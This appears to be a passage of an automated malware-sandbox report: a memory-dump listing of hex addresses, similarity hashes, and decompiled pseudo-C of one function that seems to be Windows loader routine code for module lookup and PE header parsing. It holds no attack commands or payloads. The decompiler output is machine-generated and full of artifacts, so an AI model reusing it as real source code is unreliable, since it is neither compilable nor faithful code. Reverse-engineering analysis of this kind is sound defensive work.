0x019e10ca
0x019e10cc
0x00000000
0x00000000
0x019e10dc
0x019e10de
0x00000000
0x00000000
0x00000000
0x019e0f61
0x019e0f61
0x019e0f61
0x019e0f67
0x019e0f6b
0x019e111d
0x019e111d
0x019e0f75
0x019e0f77
0x019e0f77
0x019e0f85
0x019e0f8b
0x019e10b9
0x019e10bc
0x01a3eae9
0x01a3eae9
0x019e0f91
0x019e0f91
0x019e0f91
0x019e0f96
0x019e0f98
0x019e0f9a
0x019e0f9a
0x019e0fa6
0x019e107c
0x019e107f
0x019e108d
0x00000000
0x019e108d
0x019e1081
0x019e1087
0x01a3eaf4
0x01a3eafa
0x00000000
0x00000000
0x00000000
0x01a3eb00
0x00000000
0x019e0fac
0x019e0fac
0x00000000
0x019e0fac
0x019e0fa6
0x019e0f5b
0x019e0f09
0x019e0f09
0x00000000
0x019e0f09
0x01a3ea63
0x00000000
0x01a3ea63
0x019e0ef4
0x00000000
0x00000000
0x00000000
0x019e0ef4
0x019e0ebc
0x019e0ebc
0x00000000
0x019e0ebc
0x019e0eb6
0x019e1149
0x019e114c
0x019e114d
0x00000000
0x019e114d
0x019e0ea4
0x019e0ea7
0x00000000
0x00000000
0x00000000
0x00000000
0x019e0fb7
0x019e0fb7
0x019e0fbc
0x019e0fc9
0x019e0fc9
0x019e0fce
0x019e1020
0x019e1025
0x019e1094
0x019e1094
0x019e1099
0x01a3ea04
0x01a3ea04
0x01a3ea09
0x01a3ea1c
0x01a3ea0b
0x01a3ea0b
0x01a3ea0e
0x01a3ea14
0x01a3ea14
0x01a3ea0e
0x01a3ea09
0x019e1027
0x019e1027
0x019e1155
0x019e102d
0x019e102d
0x019e102d
0x019e1032
0x01a3e9fc
0x01a3e9fc
0x019e1032
0x019e1027
0x00000000
0x019e1025
0x019e0fd0
0x01a3e9f4
0x00000000
0x01a3e9f4
0x019e0fd6
0x019e0fd9
0x019e1059
0x019e1059
0x019e105e
0x01a3e9ec
0x019e1064
0x019e1064
0x019e1064
0x019e1069
0x019e10ac
0x019e106b
0x019e106b
0x019e106e
0x019e1074
0x019e1074
0x019e106e
0x019e1069
0x00000000
0x019e105e
0x019e0fdb
0x019e10a4
0x00000000
0x019e10a4
0x019e0fe1
0x019e0fe4
0x00000000
0x00000000
0x019e0fea
0x019e0ff1
0x00000000
0x019e0ff8
0x00000000
0x00000000
0x01a3e9e4
0x00000000
0x00000000
0x019e1018
0x00000000
0x00000000
0x019e1051
0x00000000
0x00000000
0x00000000
0x00000000
0x019e0ff1
0x019e0fbe
0x019e0fc3
0x00000000
0x00000000
0x00000000
0x019e0fc3
0x019e0df3
0x01a3e9d5
0x01a3e9d7
0x019e1128
0x019e1128
0x019e112b
0x019e112d
0x019e1133
0x019e1133
0x00000000
0x019e112d
0x00000000
0x01a3e9d7
0x019e0dc2
0x019e10f6
0x019e0dd4
0x019e0dd7
0x019e0dda
0x019e0de8
0x019e0de9
0x019e0de9
0x019e0dda
0x00000000
0x019e0dc2
0x019e0dac
0x019e0dae
0x019e0db3
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23e4812340e4b27216d53cbc4653e5b021d183c5525a56c75af5e96e68034f8f
Instruction ID: 03311b40b2a2817b333878373fc48c874f4392c3faa7ddf206844699aec18f6c
Opcode Fuzzy Hash: 23e4812340e4b27216d53cbc4653e5b021d183c5525a56c75af5e96e68034f8f
Instruction Fuzzy Hash: 04D19331F042598BEB2A8E9CC4997BDBFF5FB44302F184439E54AA7285D7B49992CB40

Uniqueness

Uniqueness Score: -1.00%

Function 019FD5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E019FD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x1add360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E019F6600(0x1ad52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1ad7b9c; // 0x0
							_t281 = L01A04620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E01A2F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1ad7b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x1ad7b8c; // 0x14c2b18
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01A02280(_t200, 0x1ad84d8);
									_t277 =  *0x1ad85f4; // 0x14c3008
									_t351 =  *0x1ad85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x14c2fa0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E019FFFB0(_t287, _t353, 0x1ad84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E01A3CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E019F6600(0x1ad52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E019F7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x1adb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E01A6E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1ad8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x1adb1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x1adb218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01A02280(_t250, 0x1ad84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01A23898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E019FFFB0(_t293, _t353, 0x1ad84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E01A237F5(_t353, 0);
																}
																E01A20413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01A19B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E01A102D6(_t174);
																}
																L01A077F0( *0x1ad7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E01A1C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L019FEC7F(_t353);
										L01A119B8(_t287, 0, _t353, 0);
										_t200 = E019EF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x1adb2f8 |  *0x1adb2fc) == 0 || ( *0x1adb2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E01A2B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x1adb2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01A96B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01A96AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E019FE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L019FEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E01A29730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E019FE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L019F8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01A23C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x019fd5f2
0x019fd5f5
0x019fd5f5
0x019fd5fd
0x019fd600
0x019fd60a
0x019fd60d
0x019fd617
0x019fd61d
0x019fd627
0x019fd62e
0x019fd911
0x019fd913
0x00000000
0x019fd919
0x019fd919
0x019fd919
0x019fd634
0x019fd634
0x019fd634
0x019fd634
0x019fd640
0x019fd8bf
0x00000000
0x019fd646
0x019fd646
0x019fd64d
0x019fd652
0x01a4b2fc
0x01a4b2fc
0x01a4b302
0x01a4b33b
0x01a4b341
0x00000000
0x01a4b304
0x01a4b304
0x01a4b319
0x01a4b31e
0x01a4b324
0x01a4b326
0x01a4b332
0x01a4b347
0x01a4b34c
0x01a4b351
0x01a4b35a
0x00000000
0x01a4b328
0x01a4b328
0x00000000
0x01a4b328
0x01a4b326
0x019fd658
0x019fd658
0x019fd65b
0x019fd665
0x00000000
0x019fd66b
0x019fd66b
0x019fd66b
0x019fd66b
0x019fd66d
0x019fd672
0x019fd67a
0x00000000
0x00000000
0x019fd680
0x019fd686
0x019fd8ce
0x019fd8d4
0x019fd8dd
0x019fd8e0
0x019fd68c
0x019fd691
0x019fd69d
0x019fd6a2
0x019fd6a7
0x019fd6b0
0x019fd6b5
0x019fd6e0
0x019fd6b7
0x019fd6b7
0x019fd6b9
0x019fd6b9
0x019fd6bb
0x019fd6bd
0x019fd6ce
0x019fd6d0
0x019fd6d2
0x01a4b363
0x01a4b365
0x00000000
0x01a4b36b
0x00000000
0x01a4b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x019fd6bf
0x019fd6bf
0x019fd6e5
0x019fd6e7
0x019fd6e9
0x019fd6ec
0x019fd6ec
0x019fd6ef
0x019fd6f5
0x019fd6f9
0x019fd6fb
0x019fd6fd
0x019fd701
0x019fd703
0x019fd70a
0x019fd70a
0x019fd701
0x019fd710
0x019fd710
0x019fd6c1
0x019fd6c1
0x019fd6c6
0x01a4b36d
0x01a4b36f
0x00000000
0x01a4b375
0x01a4b375
0x01a4b375
0x00000000
0x01a4b375
0x00000000
0x019fd6cc
0x019fd6d8
0x019fd6d8
0x019fd6d8
0x00000000
0x019fd6c6
0x019fd6bf
0x00000000
0x019fd6da
0x019fd6da
0x019fd716
0x019fd71b
0x019fd720
0x019fd726
0x019fd726
0x019fd72d
0x00000000
0x019fd733
0x019fd739
0x019fd742
0x019fd750
0x019fd758
0x019fd764
0x019fd776
0x019fd77a
0x019fd783
0x019fd928
0x019fd92c
0x019fd93d
0x019fd944
0x019fd94f
0x019fd954
0x019fd956
0x019fd95f
0x019fd961
0x019fd973
0x019fd973
0x019fd956
0x019fd944
0x019fd92c
0x019fd78b
0x01a4b394
0x019fd791
0x019fd798
0x01a4b3a3
0x01a4b3bb
0x01a4b3bb
0x019fd7a5
0x019fd866
0x019fd870
0x019fd892
0x019fd898
0x019fd89e
0x019fd8a0
0x019fd8a6
0x019fd8ac
0x019fd8ae
0x019fd8b4
0x019fd8b4
0x019fd8ae
0x019fd7a5
0x019fd78b
0x019fd7b1
0x01a4b3c5
0x01a4b3c5
0x019fd7c3
0x019fd7ca
0x019fd7e5
0x019fd7eb
0x019fd8eb
0x019fd8ed
0x00000000
0x019fd8f3
0x019fd8f3
0x019fd8f3
0x00000000
0x019fd8ed
0x019fd7cc
0x019fd7cc
0x019fd7d2
0x00000000
0x019fd7d4
0x019fd7d4
0x019fd7d7
0x019fd7df
0x01a4b3d4
0x01a4b3d9
0x01a4b3dc
0x01a4b3dc
0x01a4b3df
0x01a4b3e2
0x01a4b468
0x01a4b46d
0x01a4b46f
0x01a4b46f
0x01a4b475
0x019fd8f8
0x019fd8f9
0x019fd8fd
0x01a4b3e8
0x01a4b3e8
0x01a4b3eb
0x01a4b3ed
0x00000000
0x01a4b3ef
0x01a4b3ef
0x01a4b3f1
0x01a4b3f4
0x01a4b3fe
0x01a4b404
0x01a4b409
0x01a4b40e
0x01a4b410
0x01a4b410
0x01a4b414
0x01a4b414
0x01a4b41b
0x01a4b420
0x01a4b423
0x01a4b425
0x01a4b427
0x01a4b42a
0x01a4b42d
0x01a4b42d
0x01a4b42a
0x01a4b432
0x01a4b436
0x01a4b438
0x01a4b43b
0x01a4b43b
0x01a4b449
0x01a4b44e
0x01a4b454
0x01a4b458
0x01a4b458
0x01a4b45d
0x00000000
0x01a4b45d
0x01a4b3ed
0x00000000
0x00000000
0x00000000
0x019fd7df
0x019fd7d2
0x019fd7ca
0x01a4b37c
0x01a4b37e
0x01a4b385
0x01a4b38a
0x00000000
0x01a4b38a
0x019fd742
0x019fd7f1
0x019fd7f8
0x01a4b49b
0x01a4b49b
0x019fd800
0x019fd837
0x019fd843
0x019fd845
0x019fd847
0x019fd84a
0x019fd84b
0x019fd84e
0x019fd857
0x019fd818
0x019fd824
0x019fd831
0x01a4b4a5
0x01a4b4ab
0x01a4b4b3
0x01a4b4b8
0x01a4b4bb
0x00000000
0x01a4b4c1
0x01a4b4c1
0x01a4b4c8
0x00000000
0x01a4b4ce
0x01a4b4d4
0x01a4b4e1
0x01a4b4e3
0x01a4b4e5
0x00000000
0x01a4b4eb
0x01a4b4f0
0x01a4b4f2
0x019fdac9
0x019fdacc
0x019fdacf
0x019fdad1
0x019fdd78
0x019fdd78
0x019fdcf2
0x00000000
0x019fdad7
0x019fdad9
0x019fdadb
0x00000000
0x00000000
0x019fdae1
0x019fdae1
0x019fdae4
0x019fdae6
0x01a4b4f9
0x01a4b4f9
0x01a4b500
0x019fdaec
0x019fdaec
0x019fdaf5
0x019fdaf8
0x019fdafb
0x019fdb03
0x019fdb11
0x019fdb16
0x019fdb19
0x019fdb1b
0x01a4b52c
0x01a4b531
0x01a4b534
0x019fdb21
0x019fdb21
0x019fdb24
0x019fdcd9
0x019fdce2
0x019fdce5
0x019fdd6a
0x019fdd6d
0x00000000
0x019fdd73
0x01a4b51a
0x01a4b51c
0x01a4b51f
0x01a4b524
0x00000000
0x01a4b524
0x019fdce7
0x019fdce7
0x019fdce7
0x00000000
0x019fdce7
0x00000000
0x019fdb2a
0x019fdb2c
0x019fdb31
0x019fdb33
0x019fdb36
0x019fdb39
0x019fdb3b
0x019fdb66
0x019fdb66
0x019fdb3d
0x019fdb3d
0x019fdb3e
0x019fdb46
0x019fdb47
0x019fdb49
0x019fdb4c
0x019fdb53
0x019fdb55
0x019fdb58
0x019fdb5a
0x01a4b50a
0x01a4b50f
0x01a4b512
0x019fdb60
0x019fdb60
0x019fdb63
0x019fdb63
0x00000000
0x019fdb63
0x019fdb5a
0x019fdb3b
0x019fdb24
0x019fdb69
0x019fdb69
0x019fdb6c
0x019fdb6f
0x019fdb74
0x01a4b557
0x01a4b557
0x01a4b55e
0x019fdb7a
0x019fdb7c
0x019fdb7f
0x019fdb82
0x019fdb85
0x00000000
0x019fdb8b
0x019fdb8b
0x019fdb8d
0x019fdb9b
0x019fdb9b
0x019fdb9d
0x019fdba0
0x019fdba2
0x019fdba4
0x019fdba7
0x019fdba9
0x019fdbae
0x019fdbae
0x019fdbb1
0x019fdbb4
0x019fdbb4
0x019fdbb7
0x019fdbba
0x019fdcd2
0x019fdcd4
0x00000000
0x019fdbc0
0x019fdbc0
0x019fdbd2
0x019fdbd7
0x019fdbda
0x019fdbdd
0x019fdbdf
0x00000000
0x019fdbe5
0x019fdbe5
0x019fdbee
0x019fdbf1
0x01a4b541
0x01a4b544
0x00000000
0x01a4b546
0x01a4b546
0x00000000
0x01a4b546
0x019fdbf7
0x019fdbf7
0x019fdbfd
0x019fdbfd
0x019fdbff
0x019fdc0b
0x019fdc15
0x019fdc1b
0x019fdc1d
0x019fdc21
0x019fdc21
0x019fdc23
0x019fdc23
0x019fdc26
0x019fdc29
0x019fdc2b
0x00000000
0x00000000
0x019fdc31
0x019fdc34
0x019fdc36
0x019fdcbf
0x019fdcbf
0x019fdcc2
0x00000000
0x019fdc3c
0x019fdc41
0x019fdc43
0x00000000
0x019fdc45
0x019fdc45
0x019fdc47
0x00000000
0x019fdc4d
0x019fdc4d
0x019fdc50
0x019fdc52
0x019fdc55
0x019fdcfa
0x019fdcfe
0x019fdd08
0x019fdd0a
0x019fdd0c
0x00000000
0x019fdd12
0x019fdd15
0x019fdd2d
0x019fdd2f
0x019fdd32
0x019fdd35
0x00000000
0x019fdd35
0x019fdc5b
0x019fdc5b
0x019fdc5e
0x019fdc61
0x019fdc64
0x019fdc67
0x019fdc67
0x019fdc6a
0x019fdc6c
0x019fdc8e
0x019fdc8e
0x019fdc91
0x019fdc93
0x019fdcce
0x019fdcce
0x019fdc95
0x019fdc9c
0x019fdc6e
0x019fdc72
0x019fdc75
0x019fdc77
0x019fdc79
0x01a4b551
0x01a4b551
0x00000000
0x019fdc7f
0x019fdc7f
0x019fdc81
0x00000000
0x019fdc83
0x019fdc86
0x019fdc88
0x00000000
0x00000000
0x00000000
0x00000000
0x019fdc88
0x019fdc81
0x019fdc79
0x019fdc6c
0x019fdc55
0x019fdc47
0x019fdc43
0x00000000
0x019fdc36
0x019fdc23
0x00000000
0x019fdbff
0x019fdbf1
0x019fdbdf
0x019fdb8f
0x019fdb92
0x019fdb95
0x00000000
0x00000000
0x00000000
0x00000000
0x019fdb95
0x019fdb8d
0x019fdb85
0x019fdb74
0x019fdc9f
0x019fdca2
0x019fdcb0
0x019fdcb0
0x019fdad1
0x01a4b4e5
0x01a4b4c8
0x00000000
0x00000000
0x00000000
0x019fd831
0x00000000
0x019fd800
0x01a4b47f
0x01a4b485
0x00000000
0x01a4b485
0x019fd665
0x019fd652
0x00000000

Memory Dump Source

